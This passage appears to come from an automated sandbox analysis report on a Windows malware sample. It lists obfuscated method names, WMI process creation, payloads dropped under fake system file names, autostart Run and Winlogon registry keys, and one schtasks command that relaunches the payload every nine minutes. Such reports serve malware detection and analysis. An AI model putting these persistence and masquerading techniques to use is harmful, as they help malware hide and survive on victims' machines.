            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.csHigh entropy of concatenated method names: 'C7b3NkqYAc', 'Gv53hxOwxG', 'QHr3oyBkEY', 'UqV3eAqEeT', 'Dwd3uo4JMp', 'ViD3ES93Xo', '_613', 'IO3', 'Mp1', '_7FY'
            Source: XPC5PMKegV.exe, vE1YYuTVv8jMv0AVwES.csHigh entropy of concatenated method names: '_8o8', 'kLqMeRMLWgiqFd68Ror', 'EVnuPHM0km9bXNVGoNi', 'cu1kfPMuFpNnlSrTirc', 'w7FoooMjvw5iSoy8o6p', 'ap30llMnxfUxERai0LY', 'jHagxFMot2dRcMk7SrO', 'bc4LjyMftPS7JD3BGP9', 'Pv5VG1MbR1kQSxI88fF', 'bKUDUGMXOfxfylT9wWm'
            Source: XPC5PMKegV.exe, XBTZN76hoCXgoYkol60.csHigh entropy of concatenated method names: '_5X2', '_7WJ', '_4ws', 'B28', 'PcnJcirUBUdVJNMJeYH', 'mbIHRGrTWNmcRhoAoZS', 'K7xOyTrN99H3aHAdYUk', 'PpqOhTr67jd6FVs9OMg', 'cKbHpdriVnwqKxoqbIa', 'hALbbZry6Me7rsR4A2f'
            Source: XPC5PMKegV.exe, lXoOP5QTREP9xDLYCI.csHigh entropy of concatenated method names: 'cvAfloN0H', 'Rvl0P3spn', 'kYFxlFjvw', 'L5lBGgkQPiWM4jYfeTc', 'ELDXsPks228pXv2Y9mV', 'e1JqZtk1ZnUU7usmybP', 'HHuTtjkvFguym0L0k05', 'zMC7O8kt0gek4OWcvHc', 'n6dMQOkhLPoWqCk0NIx', 'yWTtVZkdm5WpuvIYJPS'
            Source: XPC5PMKegV.exe, lhaS2MLTXsLTkjdFXaU.csHigh entropy of concatenated method names: 'DStG1dZbkuBlXQ1D21h', 'p80hBmZXIDlO70m6lU5', 'Af6PN8Zo1b4KoWDFRAr', 'Kyac6AZfGY4kriT0Q6O', 'trWnY0064i', 'QGDgbKZFv9Bt4EqXnEG', 'P66CywZZEojEb48TEyH', 'wvYQcQZ59Oxf4RHirye', 'ygoclQZSN1d6AaYYIr1', 'vFLyVnZCNlbx2n5rgXY'
            Source: XPC5PMKegV.exe, T9dPy4UqN7utw0tnUw4.csHigh entropy of concatenated method names: 'K8a', '_117', 'd7day5iD17', 'ki6avnoc3m', 'ThhaDXonNf', '_8x7', 'Irc', 'R21', 'B53', 'zP8'
            Source: XPC5PMKegV.exe, vo1wu1T6dJaT5w0DnGx.csHigh entropy of concatenated method names: 'mTCra1Up9L', 'hV1rPU0rm5', 'gctrRm1yre', 'mnarpeRd0K', 'gWFTFIw2dCZJjreDwFb', 'jaERvnwGG9maoG6VKB7', 'Soi34sw4Sq807EJsHLG', 'l6dljqwBXqDyv6D9Xpm', 'YikDItwrfC9AIywq5S7', 'UyDd6Aw3HBfE2VEdeXL'
            Source: XPC5PMKegV.exe, Cl43QepmOtAMcFsmL1I.csHigh entropy of concatenated method names: '_56e', '_248', '_86A', 'vj4', 'W5n', 'EDxWCtG8CG', 'O5wWiYyfil', 'a6B', 'Khk', 'H1w'
            Source: XPC5PMKegV.exe, yNrGelTgmYGZ9MgvvgN.csHigh entropy of concatenated method names: '_348', '_55c', 'F36', 'RU3b48ip5n', 'yXtbIqKarg', 'lw8C0DuSgnfj7xGgaO0', 'GPZo2uuFKZ8BouZLb0b', 'FFuuyNuZeUYhFQS4YFq', 'bLaX6BuCaP2QVfCYGNm', 'uT5B0ruDD6Bl1JFZvJI'
            Source: XPC5PMKegV.exe, y7DvqyrIg8iyDOvbwQd.csHigh entropy of concatenated method names: 'XakJz59fFZ', 'nHBXtw0UQQ', 'nKHXwjVJi0', 'rYoXcjhXZ7', 'VCrXJC3Dtn', 'Rb5XXG9ciS', 'L1IXStSH0C', 'aeJXsYGOkY', 'snbXreZwRP', 'RaxX4yq1Aa'
            Source: XPC5PMKegV.exe, KKQfgQUEn3LI0XDAIUd.csHigh entropy of concatenated method names: '_518', 'E6y', '_17E', '_79s', 'XCq', 'vm2', '_5yr', 'dlO', 'Q7M', '_59C'
            Source: XPC5PMKegV.exe, PiegUarrZrIu2NpVPEw.csHigh entropy of concatenated method names: 'tfJcoCkUOt', 'EhYceJuMfq', 'z2fcuySynW', 'mo3cEsycOi', 'hd0c2sYnMK', 'vjrcHNA1KR', 'hZp9e5xwOLC1uJ8xNPb', 'ppfabGxAI4SS2oFC2JA', 'XdbF6BxeLCc7Keyd36p', 'tqqB1RxIo3mTj0Fy62k'
            Source: XPC5PMKegV.exe, R8IPI66nNydVJAOWKZV.csHigh entropy of concatenated method names: 'Y23wUVNIGk', 'Vmm65AHQA1WuA2nhaxs', 'eX2iiyHvd3lUcUu2BRQ', 'VNvxf1HsBZM7uVtZVLB', 'Fv3D5fH1n5jbGtlJkXq', 'IqYbtZHtJhSRy4gofSR', '_314', '_7WJ', 'IO3', 'B28'
            Source: XPC5PMKegV.exe, OOIlrKLkTG0jrXpeMce.csHigh entropy of concatenated method names: 'EXj2FBQJr5DOQwnZeEB', 'oy5SmDQ7mEFmNBSp6TQ', 'R44978QR7oY5IviHAf0', 'l6tM6OQHJ480Lxwn96O', 'UkYqHuQx1d9jUlcUeSN', 'CeiDE5QECEpT64kR39I', 'vR8SolQPravNaVeiMg5'
            Source: XPC5PMKegV.exe, enXgVk6KGg56u0Jag5M.csHigh entropy of concatenated method names: 'SUicV37jG1', 'GHU80e7roxo9oCWdKuI', 'i7hcgT73nAcLLvHwONn', 'xVJBFo72Jct0LwpP24L', 'Eo19i57B65ijVC9G7dd', 'dPhYud7Rc6iEuMbxpxe', 'W21', '_7WJ', '_294', 'B28'
            Source: XPC5PMKegV.exe, S7e5erUHxr37upvq8hh.csHigh entropy of concatenated method names: '_5U3', '_52K', '_6a8', 'oc7d3dnj2o', 'T5cdZ8ZPrd', 'JQqddUi68p', 'MvTdjDfX36', 'TPedK2sDV4', 'O9MdaFkqmm', 'u3Ct3jdlJoOsbW8hcwG'
            Source: XPC5PMKegV.exe, qxPm6oTdim0cupUcEK5.csHigh entropy of concatenated method names: 'oB5', '_7u7', '_4U6', 'QkJvDbFMfP', 'QyAbPrwq8J', 'HDLv1N2wKv', 'YGIbY78mVD', 'cWUu14umBsXBww3EfUe', 'BMn5HJuY8X7qcXAuK0a', 'CaVEHDudOIaGaqWbyn5'
            Source: XPC5PMKegV.exe, s74Io06BHr2pCjEhhdI.csHigh entropy of concatenated method names: 'xwh', '_7WJ', '_4o3', 'B28', 'ykiLu3r3l8aIBd76wI1', 'GC8KqurR5Cul0i0v1V0', 'rFDSXIrHBW3JRRwV5MU', 'b4Krp3rJ120qxD2Osym', 'i5kTPWr79J2RT19hJNG', 'uZyr1IrxVlsrVGnTx08'
            Source: XPC5PMKegV.exe, i8pocKTsgsG0IkhvhQS.csHigh entropy of concatenated method names: 'qTn', 'rMM', '_561', 'P7I', '_6pi', 'VqM', 'H2An2c0Ip3wicG7Ny9I', 'Yb4rrV0wdoP0U9cNemA', 'kYJPPI0A4CoAc7al9mr', 'fa7aq60MIqiOEMREpjH'
            Source: XPC5PMKegV.exe, mmOEm8p5CSZgC0ko5an.csHigh entropy of concatenated method names: '_79V', 'UnI', 's58', '_442', 'aNy8tNel1R', 'Eca', 'WtI8wsI5Wr', 'YiN8c73DdP', 'Y42', '_21Q'
            Source: XPC5PMKegV.exe, AudXQJUUixdtQM6BBRJ.csHigh entropy of concatenated method names: '_77s', 'iIQ', 'vN9', '_6c2', '_4d1', '_34n', 'Jx4', 'nkV', 'k4X', 'ZyP'
            Source: XPC5PMKegV.exe, rXFcRtpLTGp6O18MHSV.csHigh entropy of concatenated method names: 'nSC1OQGxYO', 'Jt05BPnumMPpFWjxBQL', 'ayl32gnjeJaGfRXSTrR', 'w86Kv1nLU6QVxw71f8R', 'QYGVASn0Ce9Xg2BFSt3', 'Tx7vPSX8Wi', 'g2pvRIpsg0', 'NgWvp911MF', 'YeBvB6tA3m', 'AEnvfgsf7k'
            Source: XPC5PMKegV.exe, Hi7dH5L4rVvSQPVg2PM.csHigh entropy of concatenated method names: 'EN8', '_441', 'eR1', '_284', 'V32', '_8BX', 'Yh5', 'Kg3', 'n91', 'y2f'
            Source: XPC5PMKegV.exe, YqypoILMY3VB7WPY2PE.csHigh entropy of concatenated method names: 'T4YY5x6tGt', 'RFTYNpAoCA', 'igdYhZFruC', 'R0YISo1hM9RSNRag2OO', 'NQsxNU1v0ySAw4aOCOr', 'zSV9n41tdMvGMovk2Kr', 'JMycAf1dTdkWqE5jKF8', 'tMguly1lW2HJQKXnNZD'
            Source: XPC5PMKegV.exe, ah4LpdpuUH7VAKThrBc.csHigh entropy of concatenated method names: 'b67', '_943', '_2E2', 'P9S', '_7KZ', '_184', 'm97', '_2RG', 'wsE', 'o96'
            Source: XPC5PMKegV.exe, oQb8nHUr3wNVABu6NEc.csHigh entropy of concatenated method names: 'sJtZ43KauV', 'SBvZytQy9U', '_431', 'YkLZviH3lO', 'xQMZDbAbDa', 'xqJZ12h97G', 'yeHZILaJLM', 'zf0s8TtMEwgLlXpHgwj', 'L2aPPBtLXykVhSwIL3x', 'HSfHq3t0LyMtqyq6cFY'
            Source: XPC5PMKegV.exe, zjjGX4TX1grg0geHsML.csHigh entropy of concatenated method names: '_2P7', '_79b', '_16R', 'aRgvXUC6If', 'wLhbF4rG0m', 'rv2AObuIbhAQfxYTTtT', 'z6agM5uwQNOhHi6KIA4', 'urOD5ZuA6kCETXJ0vme', 'FBAovFuMRIIqGajH4yX', 'UrRR95uL5JMyuAhJAaa'
            Source: XPC5PMKegV.exe, cURt8D6W9fRgffMVW9j.csHigh entropy of concatenated method names: 'o7twawKPxq', 'DgrZp93IQ7h0KFbvp8t', 'z7153e3w0VBKkcavRTd', 'wBYttM3VZRsCj00pc92', 'gwGZL23ehfPARjRZnDs', 'I5s2F63AyVNk1qpL8mx', 'qKuTqx3MUtAEkoVwx6O', 'VWXcAr3Ly9MWBr2E4ss', 'rKhBCo30QuVLkLBWEwZ', 'K9F'
            Source: XPC5PMKegV.exe, WN9CqqUtiEwAaQv9Fqf.csHigh entropy of concatenated method names: 'TqIK9Vf9yX', 'JIX9O8lsJXUnxaHtipr', 'VGnLxYl1tKUwVKFN8nA', 'l4YHYWlCQLihowZL4ul', 'u94OVflDyReSfG1pJVU', '_8e5', 'DFsjExC3Wi', 'E75', '_2e1', '_127'
            Source: XPC5PMKegV.exe, FenpyjLwPCfwbEEXR0I.csHigh entropy of concatenated method names: '_793', '_19i', 'j2m', 'Yxs3kxR7FN', '_91O', '_7x6', 'F7G', 'ReP', 'cA7', 'ATW'
            Source: XPC5PMKegV.exe, Xr4klE60dIStoOfaxsx.csHigh entropy of concatenated method names: '_71I', '_7WJ', 'TO2', 'B28', 'URNoZbrAVGVf45mGvRY', 'GiRHeIrML89nHr1ByWH', 'ld88whrLm7RXTiNDOwN', 'r1HyTcr0ZF93LiLKsjy', 't9T0uHruAWHVJPkd5Ir', 't5wfQZrjqficcx2Iqo0'
            Source: XPC5PMKegV.exe, BraILGoZbsvlMgZRst.csHigh entropy of concatenated method names: '_3C3', '_7WJ', 'S9L', 'B28', 'OYHlc7ySn', 'HjpuYc8DdR546k9ieWe', 'Bq1noh8sO7V6ntcbtcu', 'zODreF81B53382mf0Rs', 'AfA4gu8QLrF7SJsYhWA', 'aKjr7o8vu0ounwuEHhL'
            Source: XPC5PMKegV.exe, v6xvNMjq33JygCIfgl.csHigh entropy of concatenated method names: 'HxeY9IHg5', 'Yg23nKx2v', 'vWYZ8XTCP', 'xtkdkmt92', 'bx0jbnn8A', 'EmYKiDEkW', 'kQ7acmJjn', 'bUsCYIk3n0bLg4bdM0n', 'xdCHsLkRMjTi0BvXXHI', 'AdfDlYkHtXsAjvdxktc'
            Source: XPC5PMKegV.exe, XnHcmU6sNgmgeTEWQeh.csHigh entropy of concatenated method names: '_88F', '_7WJ', '_461', 'B28', 'd4REik3no62wAjmv5JC', 'iwCo0O3oF5AYOwSp67U', 'dAPYiQ3f7nllffwVPrh', 'zhldu33b7rqQ3RcXMUW', 'MxDHxU3Xbh4Pa9aQVFk', 'i6aKmE35jsxy9qc0mo1'
            Source: XPC5PMKegV.exe, ExFbTxTctUxeJ6gZ2sm.csHigh entropy of concatenated method names: 'Iru4lDiX9B', 'wEq45uLBSL', 'jHD4NkrhHA', 'ghv4hpIOn0', 'ejWqnsMv0C5ZQDkdPZu', 'Ox8sMEMtyWlApcBvxKs', 'IExsqEMh202rmNawafV', 'PCrvQpM1QVjfBcDYVET', 'rgII1nMQrLNUdO3lxXn', 'bgHum3Mdbv1lhKFRDVV'
            Source: XPC5PMKegV.exe, emQcjYTphjRmG4e4fpO.csHigh entropy of concatenated method names: 'g90rAIJlhk', 'bv9rlgqeCI', 'dJsr5g1YZP', 'IQ5rNHeBFd', 'u74rhUQsDG', 'lrlroskSbW', 'uuqsOTwD9THOprATYHi', 'FtVdOAwZZwg2BilNSQe', 'U3pvL7wCKWopAb5Wpky', 'uLZQH5wsk76hWEBQbVH'
            Source: XPC5PMKegV.exe, fJvHgir7Sa8PWpIwxxY.csHigh entropy of concatenated method names: 'UR1X8C7fk9', 'TCvXWOtkfi', 'JO3GK7p59S5k8rCLdEc', 'Uf2rIDpSlDL8sEoR6O2', 'DqsTS8pbGjSgMJChN18', 'iQHiywpXJkadjhQ7r6o', 'WZErWYpFdBnbNd9DyRo', 'qKkgrjpZwYp59IdSqMe', 'sfH6E1pCvKDqkRo1pF1', 'AEM7Z4pDE1cxOIfmh2m'
            Source: XPC5PMKegV.exe, KMFatX6aIoqOO90nguW.csHigh entropy of concatenated method names: '_155', '_7WJ', 'viq', 'B28', 'Caa0qwBNpOf4DQRhu00', 'jTTH4XB6nSriIJsNENF', 'v3PZlOBis2hPj3bZF92', 'icwkqEBye2lPmLwRgC9', 'fVEJrCBzHBLqQ1DBmDH', 'XmlBK2rqB9uUu4B8JI6'
            Source: XPC5PMKegV.exe, YIN46I6bPIG146HOuBG.csHigh entropy of concatenated method names: 'Euhcw0v62P', 'CmMccSv0Z8', 'dSGcJsOcxJ', 'KdEMRbHOyYdJdjqYoxe', 'IRu0aXHUQHMactmfFgT', 'Nw3u5hHWl4X3QDvpiif', 'BtlULtHgDlsVJF0Ysfv', 'Rgf7rEHTTumWjO0fIxK', 'a0rvjiHNux54YZFf968', 'hr78ScH6EKMbJ1mhL3l'
            Source: XPC5PMKegV.exe, pc97v63xoNilgjE5dd.csHigh entropy of concatenated method names: '_9Qy', '_7WJ', 'M4k', 'B28', 'Fva6cm8i7SP87o4r33Z', 'ckRwne8ykMfEi4pBRJK', 'G3dZ3y8zpaMRdsZPYPc', 'ALkbWuGq1rfEHVV0PyA', 'T76tPqGkfy3AoMDgfdP', 'tmvLKFG8Q9jEWvyGPLf'
            Source: XPC5PMKegV.exe, gpVoPR6MnR9rq20vqqt.csHigh entropy of concatenated method names: '_84K', '_7WJ', 'dM7', 'B28', 'v1Kg3MR13EmAmMOH18n', 'sYJUbERQ0dZIefmpkLI', 'y4rpY3RvRfVoiMRYWGe', 'SkEfVIRtco7nJUQL1oS', 'tAZw4fRhQM4UqxWsWeY', 'm1tvKtRdoIcU9IdQV2O'
            Source: XPC5PMKegV.exe, vZcZ9lLvOdqRkTgSSt3.csHigh entropy of concatenated method names: 'md7YoYnEqj', 'sWAYelHPwL', 'm0hYuc1y5O', 'oJ0suO1KwOIOkksfT32', 'PQwfA51mbei1sI2P8oG', 'eRQpr01YO2i35lsN8iu', 'Eu5CIy198TprDrcAgIf', 'Gdwmis1a3XLLSbf67A0', 'l1xEmN1WBo0XgSPlLIJ', 'mcGcMl1gX3MHe02m3iV'
            Source: XPC5PMKegV.exe, ToRf81pKKx7PUCnYXGA.csHigh entropy of concatenated method names: 'NCaC3VLnUk', 'gkCCddsJ8l', 'dH4C8HMpQa', 'fx3CWjdkEN', 'U3MCCJL33r', 'gsPCijVs9E', 'EWvCOfouUo', 'UobCbdpi6y', 'RjuCTojRkR', 'BArCVbOFIN'
            Source: XPC5PMKegV.exe, Lc2D1kpEFFdl1WnT2Ca.csHigh entropy of concatenated method names: 'BDC8B8ErwO', 'B0e8felmwZ', 'thg805PkYx', 'XJp8xFyUog', 'DQ2893B7mk', 'PX4r9bfjgpcaX5fdLcY', 'XkfuuTf0vIu21bTHxYg', 'iGHOQCfuBLH7POr3LTV', 'qC4JSofnl1NZsNvqwec', 'fqN9b5fogGqRXgCTKmB'
            Source: XPC5PMKegV.exe, GJrlJXuKAq1ko9Y3Q7.csHigh entropy of concatenated method names: '_4I7', '_7WJ', '_98d', 'B28', 'pil8IY2TKDVusHwN18H', 'guZACt2NRiOvmsWMsA3', 'JxCEU126Mh92HPaa4uF', 'ICxoPa2iOjbG9pkX5Fl', 'NdShRW2yMDRYIstOsld', 'aNmTE02z9RLxCX4S6Pe'
            Source: XPC5PMKegV.exe, fcrO0r6TNPeWDGnraTV.csHigh entropy of concatenated method names: '_732', '_7WJ', '_1t4', 'B28', 'O3WZm8BSeZ66XDlPlZj', 's3DKXfBFLBmTWdFEDnK', 'IRByeIBZJvqJGUSaYsH', 'UtQhF5BCY3t8dRLEypS', 'cBEUrCBDqYRUtYBJ9kD', 'hinNAdBsSEK3HQNkcLj'
            Source: XPC5PMKegV.exe, aYA5pTUsFLsGxwxURbV.csHigh entropy of concatenated method names: 'ogRZnIE5cO', 'pxsZMHUsS5', 'aBeZQ9Fm3n', 'OC0Zm6F9P7', 'hxWZk4Fctu', 'LqF6DWh8DvDDTNZCl3Y', 'NZcZ0khGhCY9iFOquQy', 'suNLuCh4P65yBwD2rXd', 'zrjHAVh2rIRigZTw048', 'RpD1YahBaQpnDxDvs6j'
            Source: XPC5PMKegV.exe, wkRtMcrjodS8Q05oFyT.csHigh entropy of concatenated method names: 'WYyXMhB9vV', 'pxEXQAsOYM', 'eUXXmJpieZ', 'Tm3Xk0nZwI', 'NkxXYxSklD', 'QcnW7vcB0LiPDlDX4C9', 'KiAD3kcrNy4ZPNpTBLw', 'WpFkuCc4AaDCcpCh8J2', 'bSTgNwc2jmFE2AVZZGJ', 'zLwcjfc3jXZnKFM1OM7'
            Source: XPC5PMKegV.exe, wxkLHYngCXJyWVhuQT.csHigh entropy of concatenated method names: 'a4d', '_7WJ', 'Lq4', 'B28', 'tn2xLuGsP5jZxpZL10C', 'fZhKwFG16aBwpmmh3S9', 't9K4t3GQcBe3cGY68Al', 'fXJrHDGvSst4iOegyUW', 'yqC62VGtuFb84YyctVl', 'fBHEwrGhkDbXuXmN0Au'
            Source: XPC5PMKegV.exe, Ogvq2w6V8UPJloOWYuA.csHigh entropy of concatenated method names: '_16M', '_7WJ', 'QAc', 'B28', 'jVfpxjrbIhyFGEryxNQ', 'raDs5trXkQd5Gjriy8H', 'K18Vlkr5NdHq3EokIep', 'shkyrorSdHwl5STlHjs', 'vWk0dTrFnOJ6UP1hqvU', 'Qjy2HqrZcp0OrE6t9ik'
            Source: XPC5PMKegV.exe, TrHuoypSmf5stJTRsW5.csHigh entropy of concatenated method names: 'VUYWU8Mgy3', 'EOfWfB5orW', 't98W0NAYg3', 'WQTWx3Olgm', 'aQgW9YOPXt', 'HEPWgEGsAA', 'r9AWqEmMGa', 'XoJWGvADCe', 'm44WAE0kJZ', 'GrcWlC2Igh'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Recovery\xMLVfJVxhYAkoCJ.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Program Files (x86)\Microsoft.NET\System.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeJump to dropped file
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exeJump to dropped file

            Boot Survival

            barindex
            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Creates an undocumented autostart registry key
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Creates multiple autostart registry keys
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
